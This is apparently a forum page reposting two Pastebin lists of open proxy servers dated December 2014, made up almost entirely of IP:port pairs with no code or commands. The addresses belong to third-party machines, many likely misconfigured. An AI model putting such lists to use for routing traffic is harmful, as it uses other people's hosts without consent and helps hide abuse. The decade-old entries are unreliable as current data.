201.209.217.49:8080 201.209.225.158:8080 201.209.231.152:8080 201.209.232.133:8080 201.209.239.223:8080 201.209.5.1:8080 201.209.76.172:8080 201.209.89.82:8080 201.209.91.177:8080 201.210.106.192:8080 201.210.125.162:8080 201.210.14.154:8080 201.210.244.216:8080 201.210.53.208:8080 201.210.89.181:8080 201.210.93.4:8080 201.211.110.230:8080 201.211.118.117:8080 201.211.161.158:8080 201.211.176.33:8080 201.211.186.35:8080 201.219.22.43:8080 201.242.153.162:9064 201.242.234.225:8080 201.242.42.21:8080 201.242.44.108:8080 201.242.59.19:8080 201.242.74.128:8080 201.242.92.107:8080 201.243.100.84:9064 201.243.114.231:8080 201.243.128.49:9064 201.243.168.17:8080 201.243.198.229:8080 201.243.198.247:8080 201.243.198.42:8080 201.243.215.81:9064 201.243.41.90:8080 201.243.59.216:8080 201.243.60.12:9064 201.248.224.117:8080 201.49.104.73:8080 201.80.44.156:8080 202.101.96.154:8888 202.106.16.36:3128 202.106.169.228:8080 202.47.94.106:8080 202.56.231.117:8080 202.99.16.28:3128 203.110.160.14:8080 203.144.144.162:8080 203.144.170.99:3128 203.190.116.235:9064 203.73.225.68:9064 203.91.121.74:3128 207.91.10.234:8080 208.87.77.20:8080 209.170.151.142:7808 209.170.151.142:8089 210.101.131.231:8080 210.195.43.136:3128 210.75.14.158:80 211.144.76.220:80 211.144.81.66:18000 211.144.81.68:18000 211.162.0.163:80 212.109.144.117:8080 212.200.153.157:8080 212.232.52.56:8080 212.76.87.188:8080 213.160.139.74:3128 213.42.212.213:8080 216.109.9.77:8080 217.21.146.209:8080 218.204.159.44:8123 218.205.229.186:3128 218.207.11.93:8123 218.207.13.10:8123 218.207.16.25:8123 218.207.17.169:8123 218.207.27.156:8123 218.207.53.232:8123 218.207.55.172:8123 218.26.13.155:63000 218.44.26.122:8080 218.65.132.38:8081 218.85.78.89:9999 218.90.174.167:3128 219.143.84.46:9000 219.217.227.93:3128 219.246.65.143:3128 219.69.96.181:9064 219.84.218.50:9064 219.93.183.106:8080 220.129.161.154:9064 220.143.168.185:9064 220.143.209.133:9064 220.198.117.99:9999 220.231.32.195:3128 221.178.1.49:8123 221.178.110.193:8123 221.178.117.98:8123 221.178.119.188:8123 221.178.119.201:8123 221.178.119.226:8123 221.178.125.221:8123 221.178.15.154:8123 221.178.22.107:8123 221.178.22.170:8123 221.178.24.119:8123 221.178.25.36:8123 221.178.25.98:8123 221.178.28.141:8123 221.178.28.161:8123 221.178.28.57:8123 221.178.29.137:8123 221.178.30.181:8123 221.178.30.213:8123 221.178.30.8:8123 221.178.30.88:8123 221.178.31.111:8123 221.178.45.170:8123 221.178.45.30:8123 221.178.45.89:8123 221.178.52.29:8123 221.178.53.162:8123 221.178.53.221:8123 221.178.54.23:8123 221.178.55.57:8123 221.178.65.124:8123 221.178.67.196:8123 221.178.76.155:8123 221.178.76.44:8123 221.178.77.245:8123 221.178.77.88:8123 221.178.78.63:8123 221.178.79.202:8123 221.178.79.241:8123 221.178.80.130:8123 221.178.83.147:8123 221.178.85.221:8123 221.178.85.251:8123 221.178.96.216:8123 221.178.96.226:8123 221.178.96.233:8123 221.178.97.56:8123 221.178.98.105:8123 221.178.98.85:8123 221.178.98.9:8123 221.178.99.189:8123 221.178.99.73:8123 221.182.62.114:9999 221.182.74.112:8123 221.182.74.123:8123 221.193.249.140:3128 221.223.106.46:3128 221.238.140.164:8080 222.124.218.83:8080 222.134.47.110:9999 223.197.37.82:80 223.252.33.209:23684 223.255.160.26:3128 223.4.21.184:80 223.64.133.151:8123 223.64.135.121:8123 223.64.165.13:8123 223.64.169.194:8123 223.64.173.102:8123 223.64.182.121:8123 223.64.38.89:8123 223.66.110.117:8123 223.66.186.163:8123 223.66.41.19:8123 223.66.73.41:8123 223.66.74.161:8123 223.66.85.117:8123 223.67.141.167:8123 223.67.152.226:8123 223.67.183.80:8123 223.67.200.202:8123 223.67.201.13:8123 223.67.211.78:8123 223.67.215.158:8123 223.67.215.97:8123 223.67.221.46:8123 223.67.239.118:8123 223.67.239.132:8123 223.67.246.27:8123 223.67.66.185:8123 223.68.6.10:8000 223.82.11.159:8123 223.82.164.241:8123 223.82.167.243:8123 223.82.172.217:8123 223.82.172.241:8123 223.82.172.29:8123 223.82.203.209:8123 223.82.203.61:8123 223.82.204.140:8123 223.82.205.89:8123 223.82.217.93:8123 223.82.222.175:8123 223.82.223.23:8123 223.82.228.227:8123 223.82.228.88:8123 223.82.235.187:8123 223.82.241.164:8123 223.82.242.133:8123 223.82.242.200:8123 223.82.47.163:8123 223.82.6.80:8123 223.82.66.161:8123 223.82.68.24:8123 223.82.69.249:8123 223.82.74.23:8123 223.82.8.148:8123 223.82.82.53:8123 223.82.84.183:8123 223.82.87.29:8123 223.82.9.31:8123 223.82.91.223:8123 223.82.95.64:8123 223.83.136.120:8123 223.83.136.163:8123 223.83.141.228:8123 223.83.141.243:8123 223.83.142.56:8123 223.83.142.77:8123 223.83.161.97:8123 223.83.163.224:8123 223.83.164.248:8123 223.83.166.131:8123 223.83.186.157:8123 223.83.189.48:8123 223.83.196.118:8123 223.83.196.225:8123 223.83.197.116:8123 223.83.201.25:8123 223.83.203.88:8123 223.83.208.162:8123 223.83.210.145:8123 223.83.210.26:8123 223.83.212.208:8123 223.83.217.91:8123 223.83.218.2:8123 223.83.220.105:8123 223.83.220.236:8123 223.83.223.24:8123 223.83.233.9:8123 223.83.234.254:8123 223.83.236.134:8123 223.83.238.221:8123 223.83.26.170:8123 223.83.34.112:8123 223.83.35.80:8123 223.83.38.131:8123 223.83.39.111:8123 223.83.39.205:8123 223.83.39.61:8123 223.83.57.146:8123 223.83.58.96:8123 223.83.60.64:8123 223.83.61.125:8123 223.83.62.112:8123 223.83.77.87:8123 223.83.82.238:8123 223.83.83.169:8123 223.83.85.100:8123 223.83.87.148:8123 223.84.101.202:8123 223.84.103.180:8123 223.84.106.41:8123 223.84.131.90:8123 223.84.132.141:8123 223.84.133.219:8123 223.84.134.75:8123 223.84.134.84:8123 223.84.137.154:8123 223.84.139.196:8123 223.84.139.89:8123 223.84.14.202:8123 223.84.140.120:8123 223.84.142.188:8123 223.84.144.36:8123 223.84.144.90:8123 223.84.145.132:8123 223.84.147.165:8123 223.84.15.51:8123 223.84.151.163:8123 223.84.156.185:8123 223.84.156.192:8123 223.84.156.68:8123 223.84.157.212:8123 223.84.160.174:8123 223.84.162.179:8123 223.84.164.61:8123 223.84.167.116:8123 223.84.168.165:8123 223.84.177.158:8123 223.84.178.45:8123 223.84.179.108:8123 223.84.182.55:8123 223.84.195.4:8123 223.84.2.112:8123 223.84.204.12:8123 223.84.204.185:8123 223.84.208.122:8123 223.84.208.147:8123 223.84.208.249:8123 223.84.209.63:8123 223.84.21.232:8123 223.84.210.81:8123 223.84.212.214:8123 223.84.213.65:8123 223.84.219.131:8123 223.84.221.55:8123 223.84.23.41:8123 223.84.232.65:8123 223.84.235.152:8123 223.84.236.231:8123 223.84.236.69:8123 223.84.237.118:8123 223.84.238.217:8123 223.84.238.73:8123 223.84.24.156:8123 223.84.251.12:8123 223.84.252.103:8123 223.84.254.120:8123 223.84.254.170:8123 223.84.26.28:8123 223.84.28.125:8123 223.84.28.162:8123 223.84.28.60:8123 223.84.28.97:8123 223.84.32.141:8123 223.84.32.46:8123 223.84.4.206:8123 223.84.4.231:8123 223.84.46.7:8123 223.84.54.205:8123 223.84.7.58:8123 223.84.94.157:8123 223.84.95.49:8123 223.84.99.203:8123 223.85.110.214:8123 223.85.110.5:8123 223.85.111.81:8123 223.85.18.151:8123 223.85.20.181:8123 223.85.21.132:8123 223.85.22.187:8123 223.85.22.19:8123 223.85.22.207:8123 223.85.23.186:8123 223.85.60.182:8123 223.85.60.246:8123 223.85.60.43:8123 223.85.62.8:8123 223.85.67.240:8123 223.85.68.117:8123 223.85.80.7:8123 223.85.81.128:8123 223.85.81.18:8123 223.85.81.23:8123 223.85.94.188:8123 223.85.96.168:8123 223.85.96.5:8123 223.86.10.159:8123 223.86.101.107:8123 223.86.101.173:8123 223.86.101.224:8123 223.86.101.41:8123 223.86.102.131:8123 223.86.102.135:8123 223.86.102.144:8123 223.86.102.15:8123 223.86.102.185:8123 223.86.102.19:8123 223.86.102.72:8123 223.86.103.122:8123 223.86.11.216:8123 223.86.11.27:8123 223.86.11.55:8123 223.86.113.135:8123 223.86.113.211:8123 223.86.113.216:8123 223.86.115.29:8123 223.86.116.9:8123 223.86.118.39:8123 223.86.119.239:8123 223.86.122.249:8123 223.86.127.158:8123 223.86.127.180:8123 223.86.127.27:8123 223.86.128.253:8123 223.86.13.149:8123 223.86.131.21:8123 223.86.134.152:8123 223.86.139.203:8123 223.86.14.120:8123 223.86.15.18:8123 223.86.15.183:8123 223.86.15.9:8123 223.86.15.98:8123 223.86.171.118:8123 223.86.171.173:8123 223.86.171.18:8123 223.86.171.218:8123 223.86.171.28:8123 223.86.209.6:8123 223.86.210.109:8123 223.86.210.123:8123 223.86.210.92:8123 223.86.212.145:8123 223.86.212.234:8123 223.86.213.106:8123 223.86.213.153:8123 223.86.214.118:8123 223.86.214.234:8123 223.86.214.63:8123 223.86.215.12:8123 223.86.215.143:8123 223.86.215.39:8123 223.86.215.43:8123 223.86.215.78:8123 223.86.216.106:8123 223.86.217.139:8123 223.86.218.166:8123 223.86.219.146:8123 223.86.219.213:8123 223.86.223.171:8123 223.86.223.50:8123 223.86.3.28:8123 223.86.34.217:8123 223.86.34.91:8123 223.86.4.5:8123 223.86.43.254:8123 223.86.6.144:8123 223.86.6.194:8123 223.86.6.228:8123 223.86.6.5:8123 223.86.6.70:8123 223.86.65.10:8123 223.86.66.21:8123 223.86.67.108:8123 223.86.7.178:8123 223.86.7.46:8123 223.86.7.52:8123 223.86.72.191:8123 223.86.73.145:8123 223.86.75.113:8123 223.86.77.148:8123 223.86.79.42:8123 223.86.8.241:8123 223.86.9.121:8123 223.86.9.2:8123 223.86.97.164:8123 223.86.98.160:8123 223.86.99.128:8123 223.86.99.249:8123 223.87.109.142:8123 223.87.110.51:8123 223.87.111.138:8123 223.87.111.159:8123 223.87.111.169:8123 223.87.112.46:8123 223.87.114.224:8123 223.87.116.199:8123 223.87.117.9:8123 223.87.121.85:8123 223.87.185.238:8123 223.87.188.218:8123 223.87.190.138:8123 223.87.190.219:8123 223.87.62.200:8123 223.87.62.229:8123 223.87.75.29:8123 223.94.149.252:8123 223.99.189.102:8090 23.23.204.129:3128 23.252.122.13:3128 24.101.203.105:8800 24.107.70.79:8800 24.32.225.178:8800 27.105.158.68:9064 27.105.22.72:9064 27.116.62.75:8080 27.44.159.176:9999 27.60.97.112:9064 31.220.48.192:48388 31.220.48.202:52743 36.227.165.6:3128 36.227.82.46:9064 36.228.144.102:9064 36.230.53.214:9064 36.230.53.65:9064 36.236.204.55:9064 36.250.69.4:80 36.43.128.25:3128 36.73.14.233:8080 36.73.2.84:8088 36.73.22.11:8080 36.77.184.209:8080 36.80.158.174:8088 36.85.88.167:443 36.86.249.28:9064 37.187.183.12:3128 37.187.97.36:3128 39.1.11.50:9064 39.182.128.245:8123 39.187.41.229:8123 39.187.47.87:8123 39.188.80.89:8123 39.189.64.102:8123 39.190.106.155:8123 41.188.49.159:8080 41.222.196.52:8080 41.234.26.16:8080 41.89.96.43:3128 46.13.230.96:2020 46.21.93.18:8080 46.28.72.252:8080 46.59.77.22:8080 49.205.181.254:9064 49.207.67.140:9064 49.90.21.160:3128 49.94.29.55:3128 5.135.159.166:3128 5.135.6.168:7808 5.135.6.168:8089 5.45.100.141:80 54.160.108.87:3128 54.176.243.237:3128 54.211.2.150:3128 54.223.152.5:3128 54.223.159.87:3128 54.81.39.56:64028 54.88.45.215:8888 54.88.49.14:8888 54.88.81.254:8888 54.88.89.127:8888 58.115.16.5:9064 58.180.17.112:8080 58.220.2.135:80 58.220.2.138:80 58.220.2.140:80 58.246.199.122:3128 58.248.156.54:9999 58.251.190.68:8888 58.96.184.3:3128 59.104.195.66:9064 59.115.172.171:9064 59.152.235.139:8080 59.188.252.249:3128 59.41.47.147:80 59.60.30.252:3128 59.67.153.132:8118 59.78.160.244:8080 59.78.160.246:8080 59.78.160.247:8080 59.78.160.248:8080 59.92.112.59:9064 59.93.40.163:9064 59.95.231.167:9064 59.95.3.204:9064 60.250.81.118:80 60.250.81.118:8080 60.250.81.97:80 60.55.42.177:3128 60.55.43.3:3128 61.133.51.6:9999 61.135.137.49:9000 61.156.35.2:3128 61.158.173.188:9999 61.163.165.250:9999 61.227.126.218:9064 61.227.212.176:9064 61.228.21.248:9064 61.230.44.216:9064 61.232.6.164:8081 61.234.123.64:8080 61.62.36.151:9064 61.70.163.141:9064 61.91.251.4:8080 62.103.107.9:80 64.31.22.131:7808 64.31.22.131:8089 66.192.33.78:3128 66.192.33.78:8080 67.86.6.210:8800 68.91.163.19:8180 69.197.148.18:7808 69.197.148.18:8089 69.251.23.155:8800 69.84.207.209:8080 71.95.127.103:8800 77.81.105.147:7808 77.81.105.147:8089 77.92.104.115:8888 79.127.123.18:8080 8.225.186.27:3128 80.64.81.34:3128 81.163.88.65:8080 81.196.48.188:8888 82.118.249.190:4444 82.148.195.194:8080 82.208.99.71:3128 82.209.199.214:8080 83.142.1.45:9064 83.180.243.48:9064 83.49.78.77:8080 84.22.32.222:3128 85.249.40.14:9090 85.9.209.244:8080 86.101.235.77:8080 86.132.47.112:3128 88.117.175.30:8080 89.235.9.86:3128 89.34.12.13:8888 90.159.237.155:8080 91.108.139.115:8080 91.121.243.55:80 91.147.196.175:3128 91.204.112.42:8080 91.214.86.154:3128 91.226.108.69:80 91.235.125.3:4444 92.46.125.19:3128 92.62.230.13:8888 94.42.81.51:8080 95.0.35.141:8080 95.140.28.208:3128 95.78.171.155:8088 97.91.171.31:8800 98.178.140.49:8800 98.239.6.79:8800 98.253.230.221:8800 Sursa: 31-12-14 | Free SSL Proxies (3103) - Pastebin.com
  7. Nytro
    [h=1]31-12-14 | Fast Proxy Server List (3479)[/h]By: gelbeseiten on Dec 30th, 2014 31-12-14 | Fast Proxy Server List (3479) Checked & filtered verified L1/L2/L3 (Timeout 3) 1.160.13.205:8080 1.161.220.170:9064 1.164.181.116:9064 1.164.182.191:9064 1.164.33.82:9064 1.164.44.92:9064 1.165.109.87:9064 1.168.14.126:9064 1.168.173.214:9064 1.170.117.74:9064 1.170.118.15:9064 1.170.118.233:9064 1.170.153.124:9064 1.170.175.215:9064 1.170.23.107:9064 1.170.25.41:9064 1.171.205.102:9064 1.172.21.124:9064 1.172.57.235:9064 1.173.185.174:9064 1.173.208.235:9064 1.174.185.82:9064 1.175.121.231:9064 1.175.79.90:9064 1.186.120.185:9064 1.186.120.198:9064 1.186.14.175:9064 1.186.145.157:9064 1.186.157.64:9064 1.186.217.126:9064 1.186.235.102:9064 1.186.251.90:9064 1.191.250.68:8585 1.192.230.199:8585 1.193.86.162:8118 1.22.100.119:9064 1.22.106.14:9064 1.22.122.233:9064 1.22.84.192:9064 1.23.148.232:9064 1.23.176.32:9064 1.23.66.143:9064 1.34.66.148:80 1.84.237.203:8585 101.0.35.117:9064 101.1.16.123:3128 101.218.15.54:9064 101.226.12.223:80 101.251.238.123:8080 101.4.136.34:9999 101.4.136.5:9999 101.57.47.82:9064 101.63.120.25:9064 101.63.137.156:9064 101.63.139.122:9064 101.63.146.2:9064 101.63.200.241:9064 101.63.206.23:9064 101.63.225.191:9064 103.16.30.61:9064 103.17.164.185:80 103.23.33.88:9064 103.244.240.104:9064 103.248.248.121:8080 103.249.122.113:9064 103.249.27.25:9064 103.249.37.83:9064 103.251.82.153:9064 103.29.116.82:9064 103.3.188.221:8080 103.3.207.182:9064 103.41.176.1:7808 104.131.119.230:3128 104.131.122.190:3128 104.194.206.10:7808 104.194.206.10:8089 104.236.75.74:8080 106.0.168.46:8080 106.1.29.32:9064 106.185.32.238:8080 106.2.184.227:3128 106.2.184.227:8080 106.2.184.228:80 106.2.184.228:8080 106.2.192.23:80 106.2.192.24:80 106.216.215.185:9064 106.37.177.251:3128 106.83.241.34:8118 106.91.26.185:8118 106.91.29.155:8118 107.170.216.78:3128 107.182.17.243:7808 107.182.17.243:8089 108.61.204.79:3128 110.138.248.132:80 110.138.49.197:8080 110.153.9.250:80 110.227.61.112:9064 110.232.93.218:8087 110.255.13.216:8585 110.31.114.204:9064 110.4.12.173:80 110.4.12.178:80 110.54.224.251:8080 110.77.0.3:80 110.77.233.164:3128 110.78.155.92:3128 110.78.162.6:8080 111.1.3.38:8000 111.1.36.166:80 111.1.36.166:85 111.1.60.163:80 111.10.100.227:8123 111.10.100.236:8123 111.10.100.65:8123 111.10.102.43:8123 111.10.102.75:8123 111.10.103.14:8123 111.10.109.166:8123 111.10.112.199:8123 111.10.113.157:8123 111.10.116.42:8123 111.10.117.123:8123 111.10.118.112:8123 111.10.118.159:8123 111.10.132.219:8123 111.10.136.18:8123 111.10.137.183:8123 111.10.137.213:8123 111.10.137.94:8123 111.10.139.191:8123 111.10.139.72:8123 111.10.14.106:8123 111.10.144.150:8123 111.10.144.94:8123 111.10.145.139:8123 111.10.145.188:8123 111.10.145.65:8123 111.10.146.235:8123 111.10.147.135:8123 111.10.147.165:8123 111.10.147.19:8123 111.10.147.216:8123 111.10.147.27:8123 111.10.15.162:8123 111.10.152.119:8123 111.10.152.16:8123 111.10.152.163:8123 111.10.152.177:8123 111.10.152.219:8123 111.10.152.71:8123 111.10.153.168:8123 111.10.153.80:8123 111.10.154.11:8123 111.10.155.239:8123 111.10.155.71:8123 111.10.158.149:8123 111.10.158.91:8123 111.10.162.152:8123 111.10.164.120:8123 111.10.166.122:8123 111.10.167.176:8123 111.10.167.31:8123 111.10.172.67:8123 111.10.175.240:8123 111.10.178.217:8123 111.10.180.230:8123 111.10.185.126:8123 111.10.186.0:8123 111.10.186.139:8123 111.10.187.185:8123 111.10.187.55:8123 111.10.188.67:8123 111.10.192.124:8123 111.10.192.17:8123 111.10.194.124:8123 111.10.195.153:8123 111.10.195.69:8123 111.10.196.177:8123 111.10.196.251:8123 111.10.197.50:8123 111.10.198.100:8123 111.10.198.115:8123 111.10.198.151:8123 111.10.198.251:8123 111.10.199.47:8123 111.10.219.154:8123 111.10.29.114:8123 111.10.29.143:8123 111.10.39.115:8123 111.10.45.179:8123 111.10.48.123:8123 111.10.49.104:8123 111.10.50.119:8123 111.10.50.225:8123 111.10.72.212:8123 111.10.74.150:8123 111.10.88.162:8123 111.10.88.82:8123 111.10.90.214:8123 111.10.94.216:8123 111.10.96.11:8123 111.10.96.126:8123 111.10.96.174:8123 111.10.96.54:8123 111.10.97.154:8123 111.10.97.202:8123 111.10.97.218:8123 111.10.97.239:8123 111.10.98.63:8123 111.11.250.127:8123 111.11.95.245:80 111.13.55.3:22 111.161.126.100:80 111.161.126.101:80 111.161.126.98:80 111.161.126.99:80 111.164.222.10:8118 111.164.53.67:8118 111.166.203.67:8118 111.175.134.10:8585 111.181.149.184:8585 111.185.55.13:9064 111.192.163.150:8118 111.197.164.140:8118 111.2.240.156:8123 111.2.242.244:8123 111.2.244.128:8123 111.206.81.248:80 111.240.5.25:9064 111.241.19.252:9064 111.242.158.16:9064 111.242.47.105:9064 111.243.146.40:9064 111.243.96.138:9064 111.246.14.208:9064 111.248.174.148:9064 111.248.88.130:9064 111.249.44.56:9064 111.250.12.64:9064 111.250.74.84:9064 111.251.126.234:9064 111.251.150.143:9064 111.251.94.40:9064 111.252.190.232:8088 111.252.212.83:8088 111.252.218.173:8088 111.253.211.77:9064 111.253.57.86:9064 111.254.107.3:9064 111.254.191.27:9064 111.254.220.140:8088 111.254.222.213:8088 111.254.57.237:8088 111.255.116.16:8088 111.255.15.109:8088 111.255.164.99:8088 111.255.193.176:9064 111.255.224.18:8088 111.255.48.251:8088 111.3.68.107:8123 111.3.88.230:8123 111.3.93.255:8123 111.9.234.71:8123 111.9.243.49:8123 111.92.123.183:9064 111.95.131.85:9064 112.0.104.52:8123 112.0.119.47:8123 112.0.206.168:8123 112.0.209.223:8123 112.0.21.153:8123 112.0.212.120:8123 112.0.221.127:8123 112.0.29.43:8123 112.1.160.206:8123 112.1.167.2:8123 112.1.172.248:8123 112.1.184.59:8123 112.1.222.101:8123 112.102.14.108:8585 112.104.135.179:8088 112.104.150.123:9064 112.104.16.65:9064 112.104.196.77:8088 112.105.124.68:9064 112.105.38.10:9064 112.114.58.196:8585 112.114.76.21:18186 112.15.125.156:8123 112.15.24.11:8123 112.15.25.155:8123 112.15.29.109:8123 112.15.62.149:8123 112.15.69.118:8123 112.15.87.38:8123 112.18.11.245:8123 112.18.152.14:8123 112.18.154.101:8123 112.18.159.117:8123 112.18.159.13:8123 112.18.159.245:8123 112.18.159.36:8123 112.18.160.34:8123 112.18.160.48:8123 112.18.163.120:8123 112.18.163.174:8123 112.18.164.184:8123 112.18.166.185:8123 112.18.166.222:8123 112.18.166.249:8123 112.18.167.128:8123 112.18.167.131:8123 112.18.168.142:8123 112.18.170.139:8123 112.18.170.15:8123 112.18.170.212:8123 112.18.170.67:8123 112.18.171.32:8123 112.18.171.4:8123 112.18.172.87:8123 112.18.175.142:8123 112.18.176.142:8123 112.18.176.99:8123 112.18.177.199:8123 112.18.178.133:8123 112.18.178.15:8123 112.18.178.90:8123 112.18.179.240:8123 112.18.196.149:8123 112.18.197.85:8123 112.18.199.109:8123 112.18.199.152:8123 112.18.20.130:8123 112.18.20.205:8123 112.18.23.248:8123 112.18.24.43:8123 112.18.48.95:8123 112.18.49.53:8123 112.18.52.202:8123 112.18.56.186:8123 112.18.62.231:8123 112.18.65.203:8123 112.18.75.18:8123 112.18.79.154:8123 112.19.143.230:8123 112.197.202.100:9064 112.2.184.203:8123 112.20.156.155:8123 112.20.204.66:8123 112.20.229.8:8123 112.20.236.110:8123 112.20.246.58:8123 112.21.155.186:8123 112.21.155.98:8123 112.21.16.52:8123 112.21.211.26:8123 112.21.242.52:8123 112.21.250.161:8123 112.21.5.116:8123 112.22.227.89:8123 112.22.230.167:8123 112.22.234.50:8123 112.22.236.156:8123 112.22.245.250:8123 112.23.121.3:8123 112.23.248.74:8123 112.238.200.124:8585 112.24.126.78:8123 112.24.228.78:8123 112.24.252.80:8123 112.24.61.131:8123 112.24.78.53:8123 112.24.92.154:8123 112.24.94.24:8123 112.24.94.55:8123 112.3.104.8:8123 112.3.105.162:8123 112.3.135.88:8123 112.3.199.43:8123 112.3.202.94:8123 112.3.211.218:8123 112.44.226.140:8123 112.44.226.43:8123 112.44.227.202:8123 112.44.230.150:8123 112.44.230.190:8123 112.44.234.57:8123 112.44.236.5:8123 112.44.238.11:8123 112.44.242.197:8123 112.44.243.74:8123 112.44.247.105:8123 112.44.251.41:8123 112.45.176.162:8123 112.45.179.183:8123 112.45.179.189:8123 112.45.182.32:8123 112.45.183.43:8123 112.45.185.128:8123 112.45.185.207:8123 112.45.185.235:8123 112.45.188.73:8123 112.45.189.95:8123 112.5.253.83:80 112.65.44.71:3128 112.78.37.195:8080 112.82.169.95:18186 113.105.142.228:80 113.105.224.86:80 113.105.224.87:80 113.107.57.76:3128 113.119.205.252:9999 113.16.22.125:8118 113.16.86.127:8118 113.193.104.237:9064 113.193.193.215:9064 113.21.71.177:9064 113.214.13.1:8000 113.215.9.200:9999 113.229.74.55:8585 113.254.21.88:9064 113.57.230.54:80 113.63.211.194:8118 113.76.164.120:9999 113.87.18.234:9999 114.112.91.97:90 114.215.151.133:3128 114.215.237.93:3128 114.235.250.23:8585 114.24.12.126:9064 114.243.145.52:8118 114.25.30.237:9064 114.25.33.220:9064 114.252.255.114:8118 114.253.244.153:8118 114.255.183.163:8080 114.255.183.164:8080 114.27.12.37:9064 114.27.19.81:8088 114.27.200.161:8088 114.27.234.114:8088 114.27.250.130:8088 114.27.27.238:9064 114.27.35.239:8088 114.27.55.83:8088 114.36.20.53:9064 114.37.128.85:9064 114.37.156.31:8088 114.37.237.138:9064 114.37.40.3:8088 114.37.91.17:9064 114.38.153.199:8088 114.38.232.3:8088 114.38.67.85:8088 114.38.70.134:9064 114.39.143.6:9064 114.39.208.141:9064 114.39.243.183:8088 114.39.61.174:8088 114.40.157.120:9064 114.40.186.67:9064 114.40.227.246:9064 114.40.251.63:9064 114.40.69.242:8080 114.42.121.104:9064 114.42.146.22:9064 114.43.112.250:9064 114.43.60.98:9064 114.44.70.46:9064 114.45.32.95:9064 114.47.59.33:9064 114.69.229.69:8080 114.79.171.204:9064 115.112.130.227:9064 115.118.235.218:9064 115.119.0.138:9064 115.124.75.148:80 115.124.75.151:80 115.127.64.62:8080 115.154.191.110:3128 115.154.225.119:8585 115.184.134.62:9064 115.185.151.147:9064 115.187.47.85:9064 115.187.55.170:9064 115.187.58.10:9064 115.196.51.169:8118 115.200.38.19:18186 115.202.167.180:8585 115.225.7.91:8118 115.236.59.194:3128 115.238.225.26:80 115.240.136.160:9064 115.241.1.187:9064 115.241.86.80:9064 115.242.120.200:9064 115.242.159.138:9064 115.242.165.90:9064 115.242.250.104:9064 115.244.237.54:9064 115.245.115.177:9064 115.252.220.71:9064 115.28.137.189:3128 115.28.236.172:3128 115.28.90.72:8080 115.29.164.173:80 115.29.209.210:3128 115.29.247.115:8888 115.29.250.118:3128 115.31.160.3:8080 116.193.132.203:9064 116.20.199.92:8585 116.202.201.97:9064 116.202.241.213:9064 116.202.47.50:9064 116.202.89.220:9064 116.203.111.206:9064 116.203.215.246:9064 116.203.27.92:9064 116.207.44.70:8585 116.228.80.186:8080 116.75.196.84:9064 116.75.99.71:9064 117.135.252.14:80 117.135.252.15:80 117.135.252.17:80 117.136.148.214:8123 117.139.149.216:8123 117.139.2.50:8123 117.139.28.236:8123 117.139.28.252:8123 117.139.28.50:8123 117.139.29.33:8123 117.139.29.91:8123 117.139.36.69:8123 117.139.38.176:8123 117.139.38.18:8123 117.139.38.80:8123 117.139.39.250:8123 117.139.41.18:8123 117.139.44.171:8123 117.139.44.94:8123 117.139.45.175:8123 117.139.45.66:8123 117.139.70.128:8123 117.139.71.46:8123 117.147.206.137:8123 117.148.41.116:8123 117.148.43.158:8123 117.148.55.222:8123 117.149.196.236:8123 117.149.221.106:8123 117.149.224.141:8123 117.149.240.156:8123 117.149.243.146:8123 117.15.179.194:8585 117.162.100.136:8123 117.162.101.16:8123 117.162.105.32:8123 117.162.112.90:8123 117.162.130.107:8123 117.162.132.149:8123 117.162.135.96:8123 117.162.136.13:8123 117.162.136.20:8123 117.162.138.20:8123 117.162.139.103:8123 117.162.164.144:8123 117.162.168.37:8123 117.162.175.158:8123 117.162.206.192:8123 117.162.208.208:8123 117.162.210.16:8123 117.162.216.45:8123 117.162.225.83:8123 117.162.227.103:8123 117.162.227.252:8123 117.162.233.87:8123 117.162.239.217:8123 117.162.239.219:8123 117.162.241.81:8123 117.162.242.178:8123 117.162.248.233:8123 117.162.41.192:8123 117.162.82.174:8123 117.162.82.49:8123 117.162.97.155:8123 117.163.100.252:8123 117.163.105.194:8123 117.163.108.76:8123 117.163.112.46:8123 117.163.113.38:8123 117.163.116.134:8123 117.163.118.143:8123 117.163.123.28:8123 117.163.127.224:8123 117.163.128.121:8123 117.163.128.181:8123 117.163.129.204:8123 117.163.130.243:8123 117.163.132.85:8123 117.163.137.40:8123 117.163.138.122:8123 117.163.145.27:8123 117.163.149.82:8123 117.163.150.173:8123 117.163.151.188:8123 117.163.155.232:8123 117.163.156.218:8123 117.163.156.77:8123 117.163.157.82:8123 117.163.167.22:8123 117.163.167.37:8123 117.163.168.132:8123 117.163.17.216:8123 117.163.170.124:8123 117.163.171.42:8123 117.163.171.75:8123 117.163.179.45:8123 117.163.194.116:8123 117.163.203.129:8123 117.163.204.8:8123 117.163.21.106:8123 117.163.214.17:8123 117.163.215.96:8123 117.163.217.158:8123 117.163.220.68:8123 117.163.221.190:8123 117.163.221.202:8123 117.163.222.216:8123 117.163.225.106:8123 117.163.227.165:8123 117.163.227.188:8123 117.163.227.63:8123 117.163.228.24:8123 117.163.237.132:8123 117.163.239.150:8123 117.163.240.181:8123 117.163.245.80:8123 117.163.246.63:8123 117.163.246.89:8123 117.163.250.215:8123 117.163.252.171:8123 117.163.30.31:8123 117.163.30.70:8123 117.163.31.117:8123 117.163.31.206:8123 117.163.34.101:8123 117.163.4.206:8123 117.163.46.153:8123 117.163.64.209:8123 117.163.65.57:8123 117.163.67.71:8123 117.163.68.156:8123 117.163.68.19:8123 117.163.7.0:8123 117.163.98.255:8123 117.164.10.73:8123 117.164.107.85:8123 117.164.128.243:8123 117.164.130.179:8123 117.164.131.17:8123 117.164.133.197:8123 117.164.133.254:8123 117.164.134.168:8123 117.164.134.71:8123 117.164.135.206:8123 117.164.135.53:8123 117.164.136.150:8123 117.164.136.168:8123 117.164.136.175:8123 117.164.137.91:8123 117.164.139.166:8123 117.164.14.185:8123 117.164.140.21:8123 117.164.141.209:8123 117.164.142.81:8123 117.164.143.118:8123 117.164.143.234:8123 117.164.144.32:8123 117.164.146.12:8123 117.164.146.27:8123 117.164.150.154:8123 117.164.152.234:8123 117.164.153.82:8123 117.164.156.87:8123 117.164.157.165:8123 117.164.158.196:8123 117.164.158.59:8123 117.164.161.104:8123 117.164.161.235:8123 117.164.167.152:8123 117.164.167.203:8123 117.164.167.69:8123 117.164.171.229:8123 117.164.172.178:8123 117.164.173.215:8123 117.164.174.158:8123 117.164.174.193:8123 117.164.175.184:8123 117.164.175.233:8123 117.164.178.218:8123 117.164.184.228:8123 117.164.184.230:8123 117.164.187.224:8123 117.164.192.2:8123 117.164.193.121:8123 117.164.196.12:8123 117.164.197.211:8123 117.164.199.62:8123 117.164.201.243:8123 117.164.203.107:8123 117.164.203.191:8123 117.164.204.222:8123 117.164.204.45:8123 117.164.206.36:8123 